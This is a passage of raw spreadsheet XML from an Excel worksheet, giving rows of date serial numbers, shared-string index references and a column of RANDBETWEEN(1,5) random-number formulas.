      <c r="C23639" t="s">
        <v>10</v>
      </c>
      <c r="D23639" t="s">
        <v>178</v>
      </c>
      <c r="E23639" t="s">
        <v>21392</v>
      </c>
      <c r="F23639">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23640" s="1">
        <v>43012.385810185187</v>
      </c>
      <c r="C23640" t="s">
        <v>10</v>
      </c>
      <c r="D23640" t="s">
        <v>80</v>
      </c>
      <c r="E23640" t="s">
        <v>21393</v>
      </c>
      <c r="F23640">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23641" s="1">
        <v>43012.375763888886</v>
      </c>
      <c r="C23641" t="s">
        <v>559</v>
      </c>
      <c r="E23641" t="s">
        <v>21394</v>
      </c>
      <c r="F23641">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23642" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23642" s="1">
        <v>43012.364930555559</v>
      </c>
      <c r="C23642" t="s">
        <v>10</v>
      </c>
      <c r="D23642" t="s">
        <v>20</v>
      </c>
      <c r="E23642" t="s">
        <v>21395</v>
      </c>
      <c r="F23642">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23643" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A23643" s="1">
        <v>43012.355451388888</v>
      </c>
      <c r="C23643" t="s">
        <v>10</v>
      </c>
      <c r="D23643" t="s">
        <v>71</v>
      </c>
      <c r="E23643" s="2" t="s">
        <v>21396</v>
      </c>
      <c r="F23643">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23644" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23644" s="1">
        <v>43012.349479166667</v>
      </c>
      <c r="C23644" t="s">
        <v>124</v>
      </c>
      <c r="E23644" s="2" t="s">
        <v>21397</v>
      </c>
      <c r="F23644">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23645" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23645" s="1">
        <v>43012.342465277776</v>
      </c>
      <c r="C23645" t="s">
        <v>10</v>
      </c>
      <c r="D23645" t="s">
        <v>151</v>
      </c>
      <c r="E23645" t="s">
        <v>21398</v>
      </c>
      <c r="F23645">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23646" s="1">
        <v>43012.320023148146</v>
      </c>
      <c r="C23646" t="s">
        <v>41</v>
      </c>
      <c r="F23646">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23647" s="1">
        <v>43012.314062500001</v>
      </c>
      <c r="C23647" t="s">
        <v>10</v>
      </c>
      <c r="D23647" t="s">
        <v>23</v>
      </c>
      <c r="E23647" t="s">
        <v>21399</v>
      </c>
      <c r="F23647">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23648" s="1">
        <v>43012.313923611109</v>
      </c>
      <c r="C23648" t="s">
        <v>559</v>
      </c>
      <c r="E23648" t="s">
        <v>21400</v>
      </c>
      <c r="F23648">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23649" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23649" s="1">
        <v>43012.301817129628</v>
      </c>
      <c r="C23649" t="s">
        <v>134</v>
      </c>
      <c r="E23649" t="s">
        <v>21401</v>
      </c>
      <c r="F23649">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23650" s="1">
        <v>43012.286481481482</v>
      </c>
      <c r="C23650" t="s">
        <v>314</v>
      </c>
      <c r="E23650" t="s">
        <v>21402</v>
      </c>
      <c r="F23650">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23651" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23651" s="1">
        <v>43012.266018518516</v>
      </c>
      <c r="C23651" t="s">
        <v>454</v>
      </c>
      <c r="E23651" t="s">
        <v>6895</v>
      </c>
      <c r="F23651">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23652" s="1">
        <v>43012.260694444441</v>
      </c>
      <c r="C23652" t="s">
        <v>318</v>
      </c>
      <c r="E23652" t="s">
        <v>21403</v>
      </c>
      <c r="F23652">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23653" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23653" s="1">
        <v>43012.229583333334</v>
      </c>
      <c r="C23653" t="s">
        <v>48</v>
      </c>
      <c r="E23653" t="s">
        <v>21404</v>
      </c>
      <c r="F23653">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23654" s="1">
        <v>43012.213217592594</v>
      </c>
      <c r="C23654" t="s">
        <v>41</v>
      </c>
      <c r="E23654" t="s">
        <v>21405</v>
      </c>
      <c r="F23654">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23655" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23655" s="1">
        <v>43012.206458333334</v>
      </c>
      <c r="C23655" t="s">
        <v>454</v>
      </c>
      <c r="F23655">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23656" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23656" s="1">
        <v>43012.172384259262</v>
      </c>
      <c r="C23656" t="s">
        <v>41</v>
      </c>
      <c r="E23656" s="2" t="s">
        <v>21406</v>
      </c>
      <c r="F23656">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23657" s="1">
        <v>43012.14949074074</v>
      </c>
      <c r="C23657" t="s">
        <v>73</v>
      </c>
      <c r="E23657" t="s">
        <v>21407</v>
      </c>
      <c r="F23657">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23658" s="1">
        <v>43012.120057870372</v>
      </c>
      <c r="C23658" t="s">
        <v>301</v>
      </c>
      <c r="E23658" t="s">
        <v>21408</v>
      </c>
      <c r="F23658">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23659" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23659" s="1">
        <v>43012.116979166669</v>
      </c>
      <c r="C23659" t="s">
        <v>65</v>
      </c>
      <c r="E23659" s="2" t="s">
        <v>21409</v>
      </c>
      <c r="F23659">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23660" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A23660" s="1">
        <v>43012.065405092595</v>
      </c>
      <c r="C23660" t="s">
        <v>10</v>
      </c>
      <c r="D23660" t="s">
        <v>36</v>
      </c>
      <c r="E23660" s="2" t="s">
        <v>21410</v>
      </c>
      <c r="F23660">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23661" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23661" s="1">
        <v>43012.026863425926</v>
      </c>
      <c r="C23661" t="s">
        <v>118</v>
      </c>
      <c r="D23661" t="s">
        <v>750</v>
      </c>
      <c r="E23661" s="2" t="s">
        <v>21411</v>
      </c>
      <c r="F23661">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23662" s="1">
        <v>43011.950567129628</v>
      </c>
      <c r="C23662" t="s">
        <v>410</v>
      </c>
      <c r="E23662" t="s">
        <v>21412</v>
      </c>
      <c r="F23662">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23663" s="1">
        <v>43011.863530092596</v>
      </c>
      <c r="C23663" t="s">
        <v>10</v>
      </c>
      <c r="D23663" t="s">
        <v>494</v>
      </c>
      <c r="E23663" t="s">
        <v>21413</v>
      </c>
      <c r="F23663">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23664" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23664" s="1">
        <v>43011.744479166664</v>
      </c>
      <c r="C23664" t="s">
        <v>260</v>
      </c>
      <c r="E23664" s="2" t="s">
        <v>21414</v>
      </c>
      <c r="F23664">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23665" s="1">
        <v>43011.736516203702</v>
      </c>
      <c r="C23665" t="s">
        <v>10</v>
      </c>
      <c r="D23665" t="s">
        <v>151</v>
      </c>
      <c r="E23665" t="s">
        <v>21415</v>
      </c>
      <c r="F23665">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23666" s="1">
        <v>43011.723310185182</v>
      </c>
      <c r="C23666" t="s">
        <v>10</v>
      </c>
      <c r="D23666" t="s">
        <v>271</v>
      </c>
      <c r="E23666" t="s">
        <v>21416</v>
      </c>
      <c r="F23666">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23667" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23667" s="1">
        <v>43011.720821759256</v>
      </c>
      <c r="C23667" t="s">
        <v>10</v>
      </c>
      <c r="D23667" t="s">
        <v>20</v>
      </c>
      <c r="E23667" t="s">
        <v>21417</v>
      </c>
      <c r="F23667">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23668" s="1">
        <v>43011.71429398148</v>
      </c>
      <c r="C23668" t="s">
        <v>222</v>
      </c>
      <c r="E23668" t="s">
        <v>21418</v>
      </c>
      <c r="F23668">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23669" s="1">
        <v>43011.672488425924</v>
      </c>
      <c r="C23669" t="s">
        <v>10</v>
      </c>
      <c r="D23669" t="s">
        <v>52</v>
      </c>
      <c r="E23669" t="s">
        <v>21419</v>
      </c>
      <c r="F23669">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23670" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23670" s="1">
        <v>43011.649212962962</v>
      </c>
      <c r="C23670" t="s">
        <v>10</v>
      </c>
      <c r="D23670" t="s">
        <v>244</v>
      </c>
      <c r="E23670" s="2" t="s">
        <v>21420</v>
      </c>
      <c r="F23670">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23671" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23671" s="1">
        <v>43011.64334490741</v>
      </c>
      <c r="C23671" t="s">
        <v>10</v>
      </c>
      <c r="D23671" t="s">
        <v>46</v>
      </c>
      <c r="E23671" s="2" t="s">
        <v>21421</v>
      </c>
      <c r="F23671">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23672" s="1">
        <v>43011.627893518518</v>
      </c>
      <c r="C23672" t="s">
        <v>10</v>
      </c>
      <c r="D23672" t="s">
        <v>6</v>
      </c>
      <c r="E23672" t="s">
        <v>21422</v>
      </c>
      <c r="F23672">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23673" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23673" s="1">
        <v>43011.620844907404</v>
      </c>
      <c r="C23673" t="s">
        <v>41</v>
      </c>
      <c r="E23673" s="2" t="s">
        <v>21423</v>
      </c>
      <c r="F23673">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23674" s="1">
        <v>43011.606539351851</v>
      </c>
      <c r="C23674" t="s">
        <v>10</v>
      </c>
      <c r="D23674" t="s">
        <v>52</v>
      </c>
      <c r="E23674" t="s">
        <v>21424</v>
      </c>
      <c r="F23674">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23675" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A23675" s="1">
        <v>43011.586516203701</v>
      </c>
      <c r="C23675" t="s">
        <v>6</v>
      </c>
      <c r="D23675" t="s">
        <v>114</v>
      </c>
      <c r="E23675" s="2" t="s">
        <v>21425</v>
      </c>
      <c r="F23675">
        <f t="shared" ca="1" si="369"/>
        <v>3</v>
      </c>
    </row>
    <row r="23676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23676" s="1">
        <v>43011.584953703707</v>
      </c>
      <c r="C23676" t="s">
        <v>10</v>
      </c>
      <c r="D23676" t="s">
        <v>6</v>
      </c>
      <c r="E23676" t="s">
        <v>21426</v>
      </c>
      <c r="F23676">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23677" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23677" s="1">
        <v>43011.583854166667</v>
      </c>
      <c r="C23677" t="s">
        <v>6</v>
      </c>
      <c r="D23677" t="s">
        <v>25</v>
      </c>
      <c r="E23677" s="2" t="s">
        <v>21427</v>
      </c>
      <c r="F23677">
        <f t="shared" ca="1" si="369"/>
        <v>1</v>
      </c>
    </row>
    <row r="23678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23678" s="1">
        <v>43011.582604166666</v>
      </c>
      <c r="C23678" t="s">
        <v>10</v>
      </c>
      <c r="D23678" t="s">
        <v>192</v>
      </c>
      <c r="E23678" t="s">
        <v>21428</v>
      </c>
      <c r="F23678">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23679" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23679" s="1">
        <v>43011.582037037035</v>
      </c>
      <c r="C23679" t="s">
        <v>10</v>
      </c>
      <c r="D23679" t="s">
        <v>163</v>
      </c>
      <c r="E23679" s="2" t="s">
        <v>21429</v>
      </c>
      <c r="F23679">
        <f t="shared" ca="1" si="369"/>
        <v>2</v>
      </c>
    </row>
    <row r="23680" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23680" s="1">
        <v>43011.572071759256</v>
      </c>
      <c r="C23680" t="s">
        <v>10</v>
      </c>
      <c r="D23680" t="s">
        <v>6</v>
      </c>
      <c r="E23680" s="2" t="s">
        <v>21430</v>
      </c>
      <c r="F23680">
        <f t="shared" ca="1" si="369"/>
        <v>4</v>
      </c>
    </row>
    <row r="23681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23681" s="1">
        <v>43011.562337962961</v>
      </c>
      <c r="C23681" t="s">
        <v>260</v>
      </c>
      <c r="E23681" t="s">
        <v>21431</v>
      </c>
      <c r="F23681">
        <f t="shared" ca="1" si="369"/>
        <v>5</v>
      </c>
    </row>
    <row r="23682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23682" s="1">
        <v>43011.554456018515</v>
      </c>
      <c r="C23682" t="s">
        <v>10</v>
      </c>
      <c r="D23682" t="s">
        <v>41</v>
      </c>
      <c r="E23682" t="s">
        <v>21432</v>
      </c>
      <c r="F23682">
        <f t="shared" ref="F23682:F23745" ca="1" si="370">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="23683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23683" s="1">
        <v>43011.538877314815</v>
      </c>
      <c r="C23683" t="s">
        <v>10</v>
      </c>
      <c r="D23683" t="s">
        <v>80</v>
      </c>
      <c r="E23683" t="s">
        <v>21433</v>
      </c>
      <c r="F23683">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23684" s="1">
        <v>43011.538865740738</v>
      </c>
      <c r="C23684" t="s">
        <v>6</v>
      </c>
      <c r="D23684" t="s">
        <v>25</v>
      </c>
      <c r="E23684" t="s">
        <v>21434</v>
      </c>
      <c r="F23684">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23685" s="1">
        <v>43011.53665509259</v>
      </c>
      <c r="C23685" t="s">
        <v>10</v>
      </c>
      <c r="D23685" t="s">
        <v>80</v>
      </c>
      <c r="E23685" t="s">
        <v>21435</v>
      </c>
      <c r="F23685">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23686" s="1">
        <v>43011.531157407408</v>
      </c>
      <c r="C23686" t="s">
        <v>10</v>
      </c>
      <c r="D23686" t="s">
        <v>80</v>
      </c>
      <c r="E23686" t="s">
        <v>21436</v>
      </c>
      <c r="F23686">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23687" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23687" s="1">
        <v>43011.527280092596</v>
      </c>
      <c r="C23687" t="s">
        <v>10</v>
      </c>
      <c r="D23687" t="s">
        <v>290</v>
      </c>
      <c r="E23687" t="s">
        <v>21437</v>
      </c>
      <c r="F23687">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23688" s="1">
        <v>43011.508032407408</v>
      </c>
      <c r="C23688" t="s">
        <v>6</v>
      </c>
      <c r="D23688" t="s">
        <v>114</v>
      </c>
      <c r="E23688" t="s">
        <v>21438</v>
      </c>
      <c r="F23688">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23689" s="1">
        <v>43011.473807870374</v>
      </c>
      <c r="C23689" t="s">
        <v>10</v>
      </c>
      <c r="D23689" t="s">
        <v>271</v>
      </c>
      <c r="E23689" t="s">
        <v>21439</v>
      </c>
      <c r="F23689">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23690" s="1">
        <v>43011.470451388886</v>
      </c>
      <c r="C23690" t="s">
        <v>10</v>
      </c>
      <c r="D23690" t="s">
        <v>330</v>
      </c>
      <c r="E23690" t="s">
        <v>21440</v>
      </c>
      <c r="F23690">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23691" s="1">
        <v>43011.469884259262</v>
      </c>
      <c r="C23691" t="s">
        <v>6</v>
      </c>
      <c r="D23691" t="s">
        <v>25</v>
      </c>
      <c r="E23691" t="s">
        <v>21441</v>
      </c>
      <c r="F23691">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23692" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23692" s="1">
        <v>43011.463518518518</v>
      </c>
      <c r="C23692" t="s">
        <v>10</v>
      </c>
      <c r="D23692" t="s">
        <v>52</v>
      </c>
      <c r="E23692" s="2" t="s">
        <v>21442</v>
      </c>
      <c r="F23692">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23693" s="1">
        <v>43011.460856481484</v>
      </c>
      <c r="C23693" t="s">
        <v>48</v>
      </c>
      <c r="E23693" t="s">
        <v>21443</v>
      </c>
      <c r="F23693">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23694" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23694" s="1">
        <v>43011.45380787037</v>
      </c>
      <c r="C23694" t="s">
        <v>48</v>
      </c>
      <c r="E23694" s="2" t="s">
        <v>21444</v>
      </c>
      <c r="F23694">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23695" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23695" s="1">
        <v>43011.447812500002</v>
      </c>
      <c r="C23695" t="s">
        <v>10</v>
      </c>
      <c r="D23695" t="s">
        <v>20</v>
      </c>
      <c r="E23695" s="2" t="s">
        <v>21445</v>
      </c>
      <c r="F23695">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23696" s="1">
        <v>43011.443564814814</v>
      </c>
      <c r="C23696" t="s">
        <v>10</v>
      </c>
      <c r="D23696" t="s">
        <v>92</v>
      </c>
      <c r="E23696" t="s">
        <v>21446</v>
      </c>
      <c r="F23696">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23697" s="1">
        <v>43011.443506944444</v>
      </c>
      <c r="C23697" t="s">
        <v>10</v>
      </c>
      <c r="D23697" t="s">
        <v>23</v>
      </c>
      <c r="E23697" t="s">
        <v>21447</v>
      </c>
      <c r="F23697">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23698" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23698" s="1">
        <v>43011.437175925923</v>
      </c>
      <c r="C23698" t="s">
        <v>10</v>
      </c>
      <c r="D23698" t="s">
        <v>107</v>
      </c>
      <c r="E23698" s="2" t="s">
        <v>21448</v>
      </c>
      <c r="F23698">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23699" s="1">
        <v>43011.433912037035</v>
      </c>
      <c r="C23699" t="s">
        <v>48</v>
      </c>
      <c r="E23699" t="s">
        <v>21449</v>
      </c>
      <c r="F23699">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23700" s="1">
        <v>43011.427997685183</v>
      </c>
      <c r="C23700" t="s">
        <v>6</v>
      </c>
      <c r="D23700" t="s">
        <v>25</v>
      </c>
      <c r="E23700" t="s">
        <v>21450</v>
      </c>
      <c r="F23700">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23701" s="1">
        <v>43011.396458333336</v>
      </c>
      <c r="C23701" t="s">
        <v>10</v>
      </c>
      <c r="D23701" t="s">
        <v>23</v>
      </c>
      <c r="E23701" t="s">
        <v>21451</v>
      </c>
      <c r="F23701">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23702" s="1">
        <v>43011.395821759259</v>
      </c>
      <c r="C23702" t="s">
        <v>10</v>
      </c>
      <c r="D23702" t="s">
        <v>23</v>
      </c>
      <c r="E23702" t="s">
        <v>32</v>
      </c>
      <c r="F23702">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23703" s="1">
        <v>43011.391319444447</v>
      </c>
      <c r="C23703" t="s">
        <v>10</v>
      </c>
      <c r="D23703" t="s">
        <v>151</v>
      </c>
      <c r="E23703" t="s">
        <v>21452</v>
      </c>
      <c r="F23703">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23704" s="1">
        <v>43011.332037037035</v>
      </c>
      <c r="C23704" t="s">
        <v>10</v>
      </c>
      <c r="D23704" t="s">
        <v>41</v>
      </c>
      <c r="E23704" t="s">
        <v>21453</v>
      </c>
      <c r="F23704">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23705" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23705" s="1">
        <v>43011.309270833335</v>
      </c>
      <c r="C23705" t="s">
        <v>189</v>
      </c>
      <c r="E23705" s="2" t="s">
        <v>21454</v>
      </c>
      <c r="F23705">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23706" s="1">
        <v>43011.289687500001</v>
      </c>
      <c r="C23706" t="s">
        <v>776</v>
      </c>
      <c r="E23706" t="s">
        <v>21455</v>
      </c>
      <c r="F23706">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23707" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23707" s="1">
        <v>43011.275659722225</v>
      </c>
      <c r="C23707" t="s">
        <v>48</v>
      </c>
      <c r="E23707" s="2" t="s">
        <v>21456</v>
      </c>
      <c r="F23707">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23708" s="1">
        <v>43011.259131944447</v>
      </c>
      <c r="C23708" t="s">
        <v>10</v>
      </c>
      <c r="D23708" t="s">
        <v>20</v>
      </c>
      <c r="E23708" t="s">
        <v>21457</v>
      </c>
      <c r="F23708">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23709" s="1">
        <v>43011.258020833331</v>
      </c>
      <c r="C23709" t="s">
        <v>60</v>
      </c>
      <c r="E23709" t="s">
        <v>21458</v>
      </c>
      <c r="F23709">
        <f t="shared" ca="1" si="370"/>
        <v>1</v>
      </c>
    </row>
    <row r="23710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23710" s="1">
        <v>43011.257615740738</v>
      </c>
      <c r="C23710" t="s">
        <v>41</v>
      </c>
      <c r="E23710" t="s">
        <v>21459</v>
      </c>
      <c r="F23710">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23711" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23711" s="1">
        <v>43011.24423611111</v>
      </c>
      <c r="C23711" t="s">
        <v>48</v>
      </c>
      <c r="E23711" s="2" t="s">
        <v>21460</v>
      </c>
      <c r="F23711">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23712" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23712" s="1">
        <v>43011.228981481479</v>
      </c>
      <c r="C23712" t="s">
        <v>4852</v>
      </c>
      <c r="E23712" s="2" t="s">
        <v>21461</v>
      </c>
      <c r="F23712">
        <f t="shared" ca="1" si="370"/>
        <v>4</v>
      </c>
    </row>
    <row r="23713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23713" s="1">
        <v>43011.189479166664</v>
      </c>
      <c r="C23713" t="s">
        <v>97</v>
      </c>
      <c r="E23713" t="s">
        <v>21462</v>
      </c>
      <c r="F23713">
        <f t="shared" ca="1" si="370"/>
        <v>3</v>
      </c>
    </row>
    <row r="23714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23714" s="1">
        <v>43011.187094907407</v>
      </c>
      <c r="C23714" t="s">
        <v>97</v>
      </c>
      <c r="E23714" t="s">
        <v>21463</v>
      </c>
      <c r="F23714">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23715" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23715" s="1">
        <v>43011.146180555559</v>
      </c>
      <c r="C23715" t="s">
        <v>4800</v>
      </c>
      <c r="E23715" s="2" t="s">
        <v>21464</v>
      </c>
      <c r="F23715">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23716" s="1">
        <v>43011.108599537038</v>
      </c>
      <c r="C23716" t="s">
        <v>140</v>
      </c>
      <c r="D23716" t="s">
        <v>141</v>
      </c>
      <c r="F23716">
        <f t="shared" ca="1" si="370"/>
        <v>5</v>
      </c>
    </row>
    <row r="23717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23717" s="1">
        <v>43011.080046296294</v>
      </c>
      <c r="C23717" t="s">
        <v>1501</v>
      </c>
      <c r="E23717" t="s">
        <v>21465</v>
      </c>
      <c r="F23717">
        <f t="shared" ca="1" si="370"/>
        <v>2</v>
      </c>
    </row>
    <row r="23718" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A23718" s="1">
        <v>43011.010405092595</v>
      </c>
      <c r="C23718" t="s">
        <v>41</v>
      </c>
      <c r="E23718" s="2" t="s">
        <v>21466</v>
      </c>
      <c r="F23718">
